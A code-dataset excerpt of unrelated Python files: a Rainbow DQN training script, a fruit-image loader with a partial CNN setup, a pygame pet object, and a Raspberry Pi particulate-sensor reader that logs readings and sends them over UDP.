self.next_obs_buf[self.ptr] = next_obs\n self.acts_buf[self.ptr] = act\n self.rews_buf[self.ptr] = rew\n self.done_buf[self.ptr] = done\n self.ptr = (self.ptr + 1) % self.max_size\n self.size = min(self.size + 1, self.max_size)\n \n return self.n_step_buffer[0]\n\n def sample_batch(self) -> Dict[str, np.ndarray]:\n idxs = np.random.choice(self.size, size=self.batch_size, replace=False)\n s_lst, a_lst, r_lst, s_prime_lst, done_mask_lst = [], [], [], [], []\n \n for idx in idxs:\n s_lst.append(self.obs_buf[idx])\n a_lst.append(self.acts_buf[idx])\n r_lst.append(self.rews_buf[idx])\n s_prime_lst.append(self.next_obs_buf[idx])\n done_mask_lst.append(self.done_buf[idx])\n\n return ExperienceReplayBatch(\n np.array(s_lst), \n np.array(a_lst),\n np.array(r_lst), \n np.array(s_prime_lst),\n np.array(done_mask_lst),\n )\n \n def sample_batch_from_idxs(\n self, idxs: np.ndarray\n ):\n # for N-step Learning\n s_lst, a_lst, r_lst, s_prime_lst, done_mask_lst = [], [], [], [], []\n \n for idx in idxs:\n s_lst.append(self.obs_buf[idx])\n a_lst.append(self.acts_buf[idx])\n r_lst.append(self.rews_buf[idx])\n s_prime_lst.append(self.next_obs_buf[idx])\n done_mask_lst.append(self.done_buf[idx])\n\n return ExperienceReplayBatch(\n np.array(s_lst), \n np.array(a_lst),\n np.array(r_lst), \n np.array(s_prime_lst),\n np.array(done_mask_lst),\n )\n \n def _get_n_step_info(\n self, n_step_buffer: Deque, gamma: float\n ) -> Tuple[np.int64, np.ndarray, bool]:\n \"\"\"Return n step rew, next_obs, and done.\"\"\"\n # info of the last transition\n rew, next_obs, done = n_step_buffer[-1][-3:]\n\n for transition in reversed(list(n_step_buffer)[:-1]):\n r, n_o, d = transition[-3:]\n\n rew = r + gamma * rew * (1 - d)\n next_obs, done = (n_o, d) if d else (next_obs, done)\n\n return rew, next_obs, done\n\n def __len__(self) -> int:\n return self.size\n\nclass PrioritizedReplayBuffer(ReplayBuffer):\n \"\"\"Prioritized Replay buffer.\n \n Attributes:\n max_priority (float): max priority\n tree_ptr (int): next index of tree\n alpha (float): alpha parameter for prioritized replay buffer\n sum_tree (SumSegmentTree): sum tree for prior\n min_tree (MinSegmentTree): min tree for min prior to get max weight\n \n \"\"\"\n \n def __init__(\n self, \n size: int, \n batch_size: int = 32, \n alpha: float = 0.6,\n n_step: int = 1, \n gamma: float = 0.99,\n ):\n \"\"\"Initialization.\"\"\"\n assert alpha >= 0\n \n super(PrioritizedReplayBuffer, self).__init__(\n size, batch_size, n_step, gamma\n )\n self.max_priority, self.tree_ptr = 1.0, 0\n self.alpha = alpha\n \n # capacity must be positive and a power of 2.\n tree_capacity = 1\n while tree_capacity < self.max_size:\n tree_capacity *= 2\n\n self.sum_tree = SumSegmentTree(tree_capacity)\n self.min_tree = MinSegmentTree(tree_capacity)\n \n def store(\n self, \n obs: OdinsynthEnvStep, \n act: int, \n rew: float, \n next_obs: OdinsynthEnvStep, \n done: bool,\n ) -> Tuple[OdinsynthEnvStep, int, float, OdinsynthEnvStep, bool]:\n \"\"\"Store experience and priority.\"\"\"\n transition = super().store(obs, act, rew, next_obs, done)\n \n if transition:\n self.sum_tree[self.tree_ptr] = self.max_priority ** self.alpha\n self.min_tree[self.tree_ptr] = self.max_priority ** self.alpha\n self.tree_ptr = (self.tree_ptr + 1) % self.max_size\n \n return transition\n\n def sample_batch(self, beta: float = 0.4) -> Dict[str, np.ndarray]:\n \"\"\"Sample a batch of experiences.\"\"\"\n assert len(self) >= self.batch_size\n assert beta > 0\n \n indices = self._sample_proportional()\n obs = [self.obs_buf[i] for i in indices]\n next_obs = [self.next_obs_buf[i] for i in indices]\n acts = [self.acts_buf[i] for i in indices]\n rews = [self.rews_buf[i] for i in indices]\n done = [self.done_buf[i] for i in indices]\n weights = np.array([self._calculate_weight(i, beta) for i in indices])\n return PrioritizedExperienceReplayBatch(obs, acts, rews, next_obs, done, weights, indices)\n \n def update_priorities(self, indices: List[int], priorities: np.ndarray):\n \"\"\"Update priorities of sampled transitions.\"\"\"\n assert len(indices) == len(priorities)\n\n for idx, priority in zip(indices, priorities):\n assert priority > 0\n assert 0 <= idx < len(self)\n\n self.sum_tree[idx] = priority ** self.alpha\n self.min_tree[idx] = priority ** self.alpha\n\n self.max_priority = max(self.max_priority, priority)\n \n def _sample_proportional(self) -> List[int]:\n \"\"\"Sample indices based on proportions.\"\"\"\n indices = []\n p_total = self.sum_tree.sum(0, len(self) - 1)\n segment = p_total / self.batch_size\n \n for i in range(self.batch_size):\n a = segment * i\n b = segment * (i + 1)\n upperbound = random.uniform(a, b)\n idx = self.sum_tree.retrieve(upperbound)\n indices.append(idx)\n \n return indices\n \n def _calculate_weight(self, idx: int, beta: float):\n \"\"\"Calculate the weight of the experience at idx.\"\"\"\n # get max weight\n p_min = self.min_tree.min() / self.sum_tree.sum()\n max_weight = (p_min * len(self)) ** (-beta)\n \n # calculate weights\n p_sample = self.sum_tree[idx] / self.sum_tree.sum()\n weight = (p_sample * len(self)) ** (-beta)\n weight = weight / max_weight\n \n return weight\n\n\nExperienceReplayBatch = collections.namedtuple('ExperienceReplayBatch', ['obs', 'acts', 'rews', 'next_obs', 'done']) \nPrioritizedExperienceReplayBatch = collections.namedtuple('PrioritizedExperienceReplayBatch', ['obs', 'acts', 'rews', 'next_obs', 'done', 'weights', 'indices']) \n\n\nclass RainbowDQNAgent:\n \"\"\"DQN Agent interacting with environment.\n \n Attribute:\n env (gym.Env): openAI Gym environment\n memory (PrioritizedReplayBuffer): replay memory to store transitions\n batch_size (int): batch size for sampling\n target_update (int): period for target model's hard update\n gamma (float): discount factor\n dqn (Network): model to train and select actions\n dqn_target (Network): target model to update\n optimizer (torch.optim): optimizer for training dqn\n transition (list): transition information including \n state, action, reward, next_state, done\n v_min (float): min value of support\n v_max (float): max value of support\n atom_size (int): the unit number of support\n support (torch.Tensor): support for categorical dqn\n use_n_step (bool): whether to use n_step memory\n n_step (int): step number to calculate n-step td error\n memory_n (ReplayBuffer): n-step replay buffer\n \"\"\"\n\n def __init__(\n self, \n hparams = {},\n # memory_size: int,\n # batch_size: int,\n # target_update: int,\n # gamma: float = 0.99,\n # # PER parameters\n # alpha: float = 0.2,\n # beta: float = 0.6,\n # prior_eps: float = 1e-6,\n # # N-step Learning\n # n_step: int = 3,\n ):\n \"\"\"Initialization.\n \n Args:\n env (gym.Env): openAI Gym environment\n memory_size (int): length of memory\n batch_size (int): batch size for sampling\n target_update (int): period for target model's hard update\n lr (float): learning rate\n gamma (float): discount factor\n alpha (float): determines how much prioritization is used\n beta (float): determines how much importance sampling is used\n prior_eps (float): guarantees every transition can be sampled\n v_min (float): min value of support\n v_max (float): max value of support\n atom_size (int): the unit number of support\n n_step (int): step number to calculate n-step td error\n \"\"\"\n # action_dim = env.action_space.n\n self.hparams = hparams\n \n\n self.batch_size = self.hparams['batch_size']\n self.target_update = self.hparams['target_network_frequency']\n self.gamma = self.hparams['gamma']\n # NoisyNet: All attributes related to epsilon are removed\n \n # device: cpu / gpu\n self.device = torch.device('cuda:0')\n print(self.device)\n \n # PER\n # memory for 1-step Learning\n self.beta = self.hparams['beta']\n self.prior_eps = self.hparams['prior_eps']\n self.memory = PrioritizedReplayBuffer(\n size = self.hparams['buffer_size'], batch_size = self.batch_size, alpha=self.hparams['alpha']\n )\n \n # memory for N-step Learning\n self.use_n_step = True if self.hparams.get('n_step', 0) > 1 else False\n if self.use_n_step:\n self.n_step = self.hparams['n_step']\n self.memory_n = ReplayBuffer(\n self.hparams['buffer_size'], self.batch_size, n_step=self.hparams['n_step'], gamma=self.hparams['gamma']\n )\n \n # networks: dqn, dqn_target\n self.dqn = OdinsynthRLAgentWrapper(device=self.device)\n self.dqn_target = OdinsynthRLAgentWrapper(device=self.device)\n self.dqn_target.load_state_dict(self.dqn.state_dict())\n self.dqn_target.eval()\n \n # optimizer\n self.optimizer = torch.optim.Adam(self.dqn.parameters())\n\n # transition to store in memory\n self.transition = list()\n\n train_env_factory, test_env_factory = OdinsynthEnvFactory.get_train_test_factories(hparams.get('datapath', '/data/nlp/corpora/odinsynth/data/rules100k/'), test_size = hparams.get('test_size', 0.005))\n\n self.train_env_factory = OdinsynthEnvFactory(train_env_factory.problem_specifications[:20000])\n self.test_env_factory = test_env_factory\n\n self.train_env = OdinsynthEnvWrapper(train_env_factory)\n self.test_env = OdinsynthEnvWrapper(test_env_factory)\n\n # self.epsilon = 0.9 # self.hparams['epsilon']\n\n \n # mode: train / test\n self.is_test = False\n\n def select_action(self, obs: OdinsynthEnvStep, epsilon) -> int:\n \"\"\"Select an action from the input state.\"\"\"\n if random.random() < epsilon:\n # with torch.no_grad():\n # values = self.dqn.forward([obs])\n # values = torch.tensor(values)\n # values = F.softmax(values, dim=-1)[0][0].detach().cpu().numpy()\n # action = np.random.choice(list(range(values.shape[0])), 1, p=values)[0]\n action = self.train_env.action_space.sample()\n else:\n logits = self.dqn.forward([obs])[0][0]\n action = np.argmax(logits, axis=-1)\n\n if not self.is_test:\n self.transition = [obs, action]\n \n return action\n\n def step(self, action: np.ndarray) -> Tuple[np.ndarray, np.float64, bool]:\n \"\"\"Take an action and return the response of the env.\"\"\"\n next_state, reward, done, _ = self.train_env.step(action)\n\n if not self.is_test:\n self.transition += [reward, next_state, done]\n \n # N-step transition\n if self.use_n_step:\n one_step_transition = self.memory_n.store(*self.transition)\n # 1-step transition\n else:\n one_step_transition = self.transition\n\n # add a single step transition\n if one_step_transition:\n self.memory.store(*one_step_transition)\n \n return next_state, reward, done\n\n def update_model(self) -> torch.Tensor:\n \"\"\"Update the model by gradient descent.\"\"\"\n # PER needs beta to calculate weights\n samples = self.memory.sample_batch(self.beta)\n weights = torch.FloatTensor(\n samples.weights\n ).to(self.device)\n indices = samples.indices\n \n # 1-step Learning loss\n elementwise_loss = self._compute_dqn_loss(samples, self.gamma)\n \n # PER: importance sampling before average\n loss = torch.mean(elementwise_loss * weights)\n \n # N-step Learning loss\n # we are gonna combine 1-step loss and n-step loss so as to\n # prevent high-variance. The original rainbow employs n-step loss only.\n if self.use_n_step:\n gamma = self.gamma ** self.n_step\n samples = self.memory_n.sample_batch_from_idxs(indices)\n elementwise_loss_n_loss = self._compute_dqn_loss(samples, gamma)\n elementwise_loss += elementwise_loss_n_loss\n \n # PER: importance sampling before average\n loss = torch.mean(elementwise_loss * weights)\n\n self.optimizer.zero_grad()\n loss.backward()\n clip_grad_norm_(self.dqn.parameters(), 10.0)\n self.optimizer.step()\n \n # PER: update priorities\n loss_for_prior = elementwise_loss.detach().cpu().numpy()\n new_priorities = loss_for_prior + self.prior_eps\n self.memory.update_priorities(indices, new_priorities)\n return loss.item()\n \n def train(self):\n \"\"\"Train the agent.\"\"\"\n self.is_test = False\n \n epsilon = 0.9 # We will change this value during training using a scheduling technique\n\n state = self.train_env.reset()\n update_cnt = 0\n losses = []\n scores = []\n score = 0\n\n # for frame_idx in range(1, self.hparams['total_timesteps'] + 1):\n for frame_idx in tqdm.tqdm(range(1, self.hparams['total_timesteps'] + 1)):\n action = self.select_action(state, epsilon)\n epsilon = linear_schedule(self.hparams['start_e'], self.hparams['end_e'], self.hparams['exploration_fraction'] * self.hparams['total_timesteps'], frame_idx)\n # epsilon = multi_schedulers(frame_idx, schedulers_dict, schedulers_params_dict) #linear_schedule(self.hparams['start_e'], self.hparams['end_e'], self.hparams['exploration_fraction']*self.hparams['total_timesteps'], global_step)\n next_state, reward, done = self.step(action)\n\n state = next_state\n score += reward\n\n # PER: increase beta\n fraction = min(frame_idx / self.hparams['total_timesteps'], 1.0)\n self.beta = self.beta + fraction * (1.0 - self.beta)\n\n # if episode ends\n if done:\n state = self.train_env.reset()\n scores.append(score)\n score = 0\n\n # if training is ready\n if frame_idx > self.hparams['learning_starts']:\n loss = self.update_model()\n losses.append(loss)\n update_cnt += 1\n \n # if hard update is needed\n if update_cnt % self.target_update == 0:\n self._target_hard_update()\n\n if (frame_idx + 1) % 500 == 0:\n # print(f\"global_step={global_step}, episode_reward={total_reward/accumulation_counter}\")\n torch.save(self.dqn.state_dict(), f\"{self.hparams['savepath']}_q_network_{frame_idx}.pt\")\n torch.save(self.dqn_target.state_dict(), f\"{self.hparams['savepath']}_target_network_{frame_idx}.pt\")\n solved_percentage, steps = self.test()\n print(solved_percentage, steps)\n writer.add_scalar(\"charts/test_result_solved\", solved_percentage, frame_idx)\n writer.add_scalar(\"charts/test_result_steps\", steps, frame_idx)\n self.dqn.train()\n\n\n # plotting\n # if frame_idx % plotting_interval == 0:\n # self._plot(frame_idx, scores, losses)\n \n self.train_env.close()\n # writer.close()\n print(f\"runs/{experiment_name}\")\n \n def save_model(self):\n torch.save(self.dqn.state_dict(), f\"{self.hparams['savepath']}_q_network5.pt\")\n torch.save(self.dqn_target.state_dict(), f\"{self.hparams['savepath']}_target_network5.pt\")\n\n\n def solve_env(self, env: OdinsynthEnv, start_obs): \n obs, reward, done, metadata = start_obs, None, False, None\n steps = 0\n while not done:\n steps += 1\n with torch.no_grad():\n logits = self.dqn.forward([obs])[0][0]\n action = np.argmax(logits, axis=-1)\n obs, reward, done, metadata = env.step(action)\n if metadata['solution']:\n done = True # Not necessary\n return (True, steps)\n elif metadata['compromised']:\n done = True # Not necessary\n return (False, steps)\n elif obs.query.is_valid_query():\n done = True # Not necessary\n return (False, steps)\n\n\n def test(self):\n solved = []\n steps = []\n self.dqn.eval()\n for ps in self.test_env_factory.problem_specifications:\n result = self.solve_env(OdinsynthEnv(ps), OdinsynthEnvStep(HoleQuery(), ps))\n solved.append(result[0])\n steps.append(result[1])\n # results = [self.solve_env(OdinsynthEnv(ps), OdinsynthEnvStep(HoleQuery(), ps)) for ps in self.test_env_factory.problem_specifications]\n self.dqn.train()\n return len([x for x in solved if x]) / len(solved), np.mean(steps)\n\n def _compute_dqn_loss(self, samples: PrioritizedExperienceReplayBatch, gamma: float) -> torch.Tensor:\n \"\"\"Return categorical dqn loss.\"\"\"\n s_obs, s_actions, s_rewards, s_next_obses, s_dones, weights, indices = samples\n\n dqn_prediction = self.dqn.forward(s_next_obses)\n dqn_argmax = [np.argmax(x[0]) for x in dqn_prediction]\n\n with torch.no_grad():\n tn_forward = self.dqn_target.forward(s_next_obses)\n tn_values = torch.tensor([nobse[0][a] for nobse, a in zip(tn_forward, dqn_argmax)]).to(self.device) # torch.max(target_network.forward(s_next_obses), dim=1)[0]\n target = torch.tensor(s_rewards).to(self.device) + gamma * tn_values * (1 - torch.tensor(s_dones).to(self.device).int()).double()\n\n old_val = self.dqn.forward_batched_helper(s_obs, s_actions).double()\n elementwise_loss = F.mse_loss(old_val, target, reduction='none')\n\n return elementwise_loss\n\n def _target_hard_update(self):\n \"\"\"Hard update: target <- local.\"\"\"\n self.dqn_target.load_state_dict(self.dqn.state_dict())\n \n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='DQN agent')\n # Common arguments\n parser.add_argument('--exp-name', type=str, default=os.path.basename(__file__).rstrip(\".py\"),\n help='the name of this experiment')\n parser.add_argument('--gym-id', type=str, default=\"odinsynth\",\n help='the id of the gym environment')\n parser.add_argument('--learning-rate', type=float, default=3e-5,\n help='the learning rate of the optimizer')\n parser.add_argument('--seed', type=int, default=1,\n help='seed of the experiment')\n parser.add_argument('--total-timesteps', type=int, default=20000,\n help='total timesteps of the experiments')\n parser.add_argument('--torch-deterministic', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,\n help='if toggled, `torch.backends.cudnn.deterministic=False`')\n parser.add_argument('--cuda', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,\n help='if toggled, cuda will not be enabled by default')\n parser.add_argument('--prod-mode', type=lambda x:bool(strtobool(x)), default=False, nargs='?', const=True,\n help='run the script in production mode and use wandb to log outputs')\n parser.add_argument('--capture-video', type=lambda x:bool(strtobool(x)), default=False, nargs='?', const=True,\n help='weather to capture videos of the agent performances (check out `videos` folder)')\n parser.add_argument('--wandb-project-name', type=str, default=\"cleanRL\",\n help=\"the wandb's project name\")\n parser.add_argument('--wandb-entity', type=str, default=None,\n help=\"the entity (team) of wandb's project\")\n \n # Algorithm specific arguments\n parser.add_argument('--buffer-size', type=int, default=50000,\n help='the replay memory buffer size')\n parser.add_argument('--gamma', type=float, default=0.9,\n help='the discount factor gamma')\n parser.add_argument('--target-network-frequency', type=int, default=500,\n help=\"the timesteps it takes to update the target network\")\n parser.add_argument('--max-grad-norm', type=float, default=5,\n help='the maximum norm for the gradient clipping')\n parser.add_argument('--batch-size', type=int, default=32,\n help=\"the batch size of sample from the reply memory\")\n parser.add_argument('--start-e', type=float, default=1,\n help=\"the starting epsilon for exploration\")\n parser.add_argument('--end-e', type=float, default=0.0001,\n help=\"the ending epsilon for exploration\")\n parser.add_argument('--exploration-fraction', type=float, default=0.6,\n help=\"the fraction of `total-timesteps` it takes from start-e to go end-e\")\n parser.add_argument('--learning-starts', type=int, default=20000,\n help=\"timestep to start learning\")\n parser.add_argument('--train-frequency', type=int, default=1,\n help=\"the frequency of training\")\n parser.add_argument('--accumulate-gradient', type=int, default=64,\n help=\"for how many steps to accumulate the gradient\")\n parser.add_argument('--test-every', type=int, default=10000,\n help=\"test every time this number of steps has passed\")\n parser.add_argument('--savepath', type=str, default=\"/home/rvacareanu/projects/odinsynth/python/results/rl/from_pretrained_default\",\n help=\"where to save\")\n parser.add_argument('--datapath', type=str, default=\"/data/nlp/corpora/odinsynth/data/rules100k/\",\n help=\"where is the data\")\n parser.add_argument('-ad', '--additonal-details', type=str, default=None,\n help=\"More details about this run\")\n parser.add_argument('--beta', type=float, default=0.4,\n help=\"PER specific; How much importance sampling is used\")\n parser.add_argument('--prior-eps', type=float, default=1e-6,\n help=\"PER specific; Guarantees that every transition can be sampled\")\n parser.add_argument('--alpha', type=float, default=0.2,\n help=\"PER specific; How much prioritization is used\")\n\n\nargs = parser.parse_args()\n# if not args.seed:\n # args.seed = int(time.time())\nfrom utils import init_random\nimport time\ninit_random(1)\nprint(vars(args))\n\n\nexperiment_name = f\"{args.gym_id}__{args.exp_name}__{args.seed}__{int(time.time())}\"\nsavepath_split = args.savepath.split('/')[-1]\nwriter = SummaryWriter(f\"runs/{experiment_name}_{savepath_split}\")\nwriter.add_text('hyperparameters', \"|param|value|\\n|-|-|\\n%s\" % (\n '\\n'.join([f\"|{key}|{value}|\" for key, value in vars(args).items()])))\n\n\ndqn_agent = RainbowDQNAgent(vars(args))\nsolved_percentage, steps = dqn_agent.test()\nprint(solved_percentage, steps)\ndqn_agent.train()\n\n","sub_path":"lrec2022-odinsynth/python/rl_rainbow_implementation.py","file_name":"rl_rainbow_implementation.py","file_ext":"py","file_size_in_byte":26535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"369260702","text":"import os\r\nimport random\r\nfrom os.path import join as pathjoin\r\nimport skimage\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom skimage import color, data, transform\r\nfrom sklearn.utils import shuffle\r\nimport keras\r\nfrom keras.utils import np_utils\r\nfrom example_.isinstance_ import iscastable\r\nimport tensorflow as tf\r\n\r\nBASE_PATH = 'C://var//images//Fruit-Images-Dataset-master'\r\n\r\n\r\ndef format_path(img):\r\n yes_int = []\r\n for s in range(len(img)):\r\n img[s] = img[s].split('_')\r\n if iscastable.IsCastableNumber(img[s][0])():\r\n img[s][0] = int(img[s][0])\r\n yes_int.append(img[s])\r\n yes_int.sort()\r\n for yi in range(len(yes_int)):\r\n yes_int[yi][0] = str(yes_int[yi][0])\r\n yes_int[yi] = yes_int[yi][0] + '_' + yes_int[yi][1]\r\n no5_img = yes_int[4]\r\n return no5_img\r\n\r\n\r\ndef load_data(dir_path):\r\n image_list = []\r\n label_list = []\r\n\r\n # 每个文件夹下的第5张图片实例\r\n no5_image_list = []\r\n\r\n # 每个文件夹下的第5张图片路径名\r\n no5_label_list = []\r\n\r\n n = 0\r\n for lab in os.listdir(pathjoin(dir_path)):\r\n _images = os.listdir(pathjoin(dir_path, lab))\r\n for img in _images:\r\n label_list.append(n)\r\n image_list.append(skimage.data.imread(pathjoin(dir_path, lab, img)))\r\n\r\n n += 1\r\n no5_label_list.append(lab)\r\n no5_image_list.append(skimage.data.imread(pathjoin(dir_path, lab, format_path(_images))))\r\n\r\n return image_list, label_list, no5_image_list, no5_label_list\r\n\r\n\r\ndef print_data_len():\r\n # os.chdir('C://var//images//Fruit-Images-Dataset-master')\r\n base_path = 'C://var//images//Fruit-Images-Dataset-master'\r\n pathTraining = pathjoin(base_path, 'Training')\r\n\r\n images, labels, no5_images, no5_labels = load_data(pathTraining)\r\n print(len(images), len(labels), len(no5_images), len(no5_labels))\r\n\r\n\r\ndef display_data(no5_images, no5_labels):\r\n plt.figure()\r\n for i in range(len(no5_images)):\r\n plt.subplot(12, 10, i + 1)\r\n plt.rcParams.update({'font.size': 6})\r\n plt.title(no5_labels[i], )\r\n plt.imshow(no5_images[i])\r\n plt.axis('off')\r\n\r\n plt.subplots_adjust(\r\n top=0.975,\r\n bottom=0.025,\r\n left=0.010,\r\n right=0.990,\r\n hspace=0.3,\r\n wspace=0.000,\r\n )\r\n\r\n plt.show()\r\n\r\n\r\ndef load_small_set(dir_path, times):\r\n image_list = []\r\n label_list = []\r\n n = 0\r\n for lab in os.listdir(dir_path):\r\n if n >= times: break\r\n for image in os.listdir(pathjoin(dir_path, lab)):\r\n label_list.append(int(n))\r\n image_list.append(skimage.data.imread(pathjoin(dir_path, lab, image)))\r\n n += 1\r\n return image_list, label_list,\r\n\r\n\r\ndef run_display_data():\r\n images, labels, no5_images, no5_labels = load_data(pathjoin(BASE_PATH, 'Training'))\r\n display_data(no5_images, no5_labels)\r\n\r\n\r\ndef cut_image(images, w, h):\r\n return [skimage.transform.resize(I, (w, h)) for I in images]\r\n\r\n\r\n# def prepare_data(images, labels, n_classes):\r\n# train_x = np.array(images)\r\n# train_y = np.array(labels)\r\n# idx = np.arange(0, train_y.shape[0])\r\n# idx = shuffle(idx)\r\n# train_x = train_x[idx]\r\n# train_y = train_y[idx]\r\n# train_y = keras.utils.to_categorical(train_y, n_classes)\r\n# return train_x, train_y\r\n\r\ndef prepare_data(images, labels, n_classes):\r\n train_x = np.array(images)\r\n train_y = np.array(labels)\r\n nrand = random.randint(0, 100)\r\n\r\n random.seed(nrand)\r\n random.shuffle(train_x)\r\n random.seed(nrand)\r\n random.shuffle(train_y)\r\n\r\n return train_x, keras.utils.to_categorical(train_y, n_classes) # one-hot 独热编码\r\n\r\n\r\ndef run_prepare_data():\r\n images_training, labels_training = load_small_set(pathjoin(BASE_PATH, 'Training'), 20)\r\n images_test, labels_test = load_small_set(pathjoin(BASE_PATH, 'Test'), 20)\r\n\r\n\r\ndef run_tf(train_x, test_x: np.ndarray):\r\n # 数据的类别\r\n n_classes = 20\r\n\r\n # 训练块的大小\r\n batch_size = 128\r\n\r\n # 卷积核尺寸\r\n kernel_h = kernel_w = 5\r\n\r\n # dropout 概率\r\n dropout = 0.8\r\n\r\n # 图片的通道数\r\n depth_in = 3\r\n\r\n # 第一层卷积的卷积核个数\r\n depth_out_l1 = 64\r\n\r\n # 第二层卷积的卷积核个数\r\n depth_out_l2 = 128\r\n\r\n # 图片尺寸\r\n image_size = train_x.shape[1]\r\n\r\n # 训练样本个数\r\n n_train_sample = train_x.shape[0]\r\n\r\n # 测试样本个数\r\n n_test_sample = test_x.shape[0]\r\n\r\n # feed给神经网络的图像数据类型与shape,shape四维,第一维训练的数据量,第二、三维图片尺寸,第四维图像通道数\r\n x = tf.placeholder(tf.float32, [None, 100, 100, 3])\r\n\r\n # feed给神经网络的标签数据的类型和shape\r\n y = tf.placeholder(tf.float32, [None, n_classes])\r\n\r\n # dropout的placeholder,解决过拟合\r\n keep_prob = tf.placeholder(tf.float32)\r\n\r\n # 用于扁平化处理的参数经过两层卷积池化后的图像大小*第二层的卷积核个数\r\n fla = int((image_size * image_size / 16) * depth_out_l2)\r\n\r\n # 定义各卷积层和全连接层的权重变量\r\n weights = {\r\n 'con1_w': tf.Variable(tf.random_normal([kernel_h, kernel_w, depth_in, depth_out_l1])),\r\n 'con2_w': tf.Variable(tf.random_normal([kernel_h, kernel_w, depth_out_l1, depth_out_l2])),\r\n 'fc_w1': tf.Variable(tf.random_normal([int((image_size * image_size / 16) * depth_out_l2), 1024])),\r\n 'fc_w2': tf.Variable(tf.random_normal([1024, 512])),\r\n 'out': tf.Variable(tf.random_normal([512, n_classes])),\r\n }\r\n\r\n # 定义各卷积层和全连接层的偏置变量\r\n bias = {\r\n 'conv1_b': tf.Variable(tf.random_normal([depth_out_l1])),\r\n 'conv2_b': tf.Variable(tf.random_normal([depth_out_l2])),\r\n 'fc_b1': tf.Variable(tf.random_normal([1024])),\r\n 'fc_b2': tf.Variable(tf.random_normal([512])),\r\n 'out': tf.Variable(tf.random_normal([n_classes])),\r\n }\r\n\r\n\r\nif __name__ == '__main__':\r\n # test_display_data()\r\n run_prepare_data()\r\n","sub_path":"basic_/ai_/recognize_fruits/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":6103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"375680441","text":"import Model.const as model_const\nfrom pygame.math import Vector2 as Vec\nimport random\n\nclass Pet(object):\n __slots__ = ('owner_index', 'carry_max', 'carry_now', 'position', 'radius', 'color', 'direction', 'status', 'speed', 'cd_time', 'cd')\n def __init__(self, owner_index, position):\n self.owner_index = owner_index\n self.carry_max = model_const.pet_carry_max\n self.carry_now = 0\n self.position = Vec(position)\n self.radius = model_const.pet_radius\n self.color = [ random.randint(0, 255) for _ in range(3) ]\n self.direction = Vec(0, 0)\n \"\"\"\n Pet is a circle\n \"\"\"\n self.status = 0\n \"\"\"\n 0 for staying base\n 1 for chasing the player\n 2 for going base\n \"\"\"\n self.speed = model_const.pet_normal_speed\n self.cd_time = model_const.pet_cd_time\n self.cd = self.cd_time\n \n def check_collide_with_player(self, player):\n if self.status == 1 and Vec(self.position - player.position).length() <= player.radius + self.radius:\n delta = min(self.carry_max - self.carry_now, player.value)\n self.carry_now += delta\n player.value -= delta\n self.status = 2\n \n def change_status(self, new_status):\n self.status = new_status\n \n def check_collide_with_base(self, base):\n if self.status == 2 and Vec(self.position - base.center).length() <= self.radius:\n self.status = 0\n self.cd = self.cd_time\n base.value_sum += self.carry_now\n self.carry_now = 0\n \n def update(self, player_list, base_list):\n self.check_collide_with_player(player_list[self.owner_index])\n self.check_collide_with_base(base_list[self.owner_index])\n if self.status == 0:\n self.direction = Vec(0, 0)\n self.cd -= 1\n if self.cd == 0:\n self.change_status(1)\n else:\n target = (player_list[self.owner_index].position if self.status == 1 \\\n else base_list[self.owner_index].center)\n self.direction = Vec.normalize(target - self.position)\n self.position += self.direction * self.speed\n\n","sub_path":"Model/GameObject/pet.py","file_name":"pet.py","file_ext":"py","file_size_in_byte":2225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"507403958","text":"import serial\nimport time\nimport datetime\nimport json\nimport socket\nimport csv\n\n# setup onboard serial port NB RPi 3 address\nport = serial.Serial('/dev/ttyS0', baudrate=9600, timeout=2.0)\nremote_PORT = 33333;\nremote_HOST = '138.68.134.165'\ncsvFile=\"/home/pi/AirQuality/client/pm.log\"\nw = csv.writer(open(csvFile,'a'),dialect='excel')\nlocal_PORT = 33333\nlocal_HOST = '10.15.40.221'\n# function to read a line of serial data\ndef read_pm_line(_port):\n rv = b''\n while True:\n ch1 = _port.read()\n if ch1 == b'\\x42':\n ch2 = _port.read()\n if ch2 == b'\\x4d':\n rv += ch1 + ch2\n rv += _port.read(28)\n return rv\n\n# initalise variables\nloop = 0\n# rcv_list = []\n\nwhile True: # replace with timed polling\n try:\n print(\"trying to read\")\n rcv = read_pm_line(port)\n print(\"is reading\")\n# probably a more 'python' way of doing this\n\n\n res = {\n '_type': 'pm',\n '$timestamp': str(datetime.datetime.now()),\n '$PM10': ord(rcv[4]) * 256 + ord(rcv[5]),\n '$PM25_CF1': ord(rcv[6]) * 256 + ord(rcv[7]),\n '$PM100_CF1': ord(rcv[8]) * 256 + ord(rcv[9]),\n '$PM10_STD': ord(rcv[10]) * 256 + ord(rcv[11]),\n '$PM25_STD': 0.01*(ord(rcv[12]) * 256 + ord(rcv[13])),\n '$PM100_STD': ord(rcv[14]) * 256 + ord(rcv[15]),\n '$gr03um': ord(rcv[16]) * 256 + ord(rcv[17]),\n '$gt05um': ord(rcv[18]) * 256 + ord(rcv[19]),\n '$gr10um': ord(rcv[20]) * 256 + ord(rcv[21]),\n '$gr25um': ord(rcv[22]) * 256 + ord(rcv[23]),\n '$gr50um': ord(rcv[24]) * 256 + ord(rcv[25]),\n '$gr100um': ord(rcv[26]) * 256 + ord(rcv[27])\n }\n\n # convert message to JSON\n # actual numbers in names only (name)/10\n\n # message = ('===============\\n'\n # '$timestamp :{}'\n # '$PM10 : {}'\n # '$PM25_CF1: {}'\n # '$PM10_CF1: {}'\n # '$PM10_STD: {}'\n # '$PM25_STD: {}'\n # '$PM100_STD: {}'\n # '$gr03um : {}'\n # '$gr05um : {}'\n # '$gr10um : {}'\n # '$gr25um : {}'\n # '$gr50um : {}'\n # '$gr10um : {}'.format(res['timestamp'], res['apm10'], res['apm25'], res['apm100'],\n # res['pm10'], res['pm25'], res['pm100'],\n # res['gt03um'], res['gt05um'], res['gt10um'],\n # res['gt25um'], res['gt50um'], res['gt100um']))\n message = json.dumps(res)\n print(message)\n w.writerow(message)\n sock = socket.socket(socket.AF_INET, # Internet\n socket.SOCK_DGRAM) # UDP\n 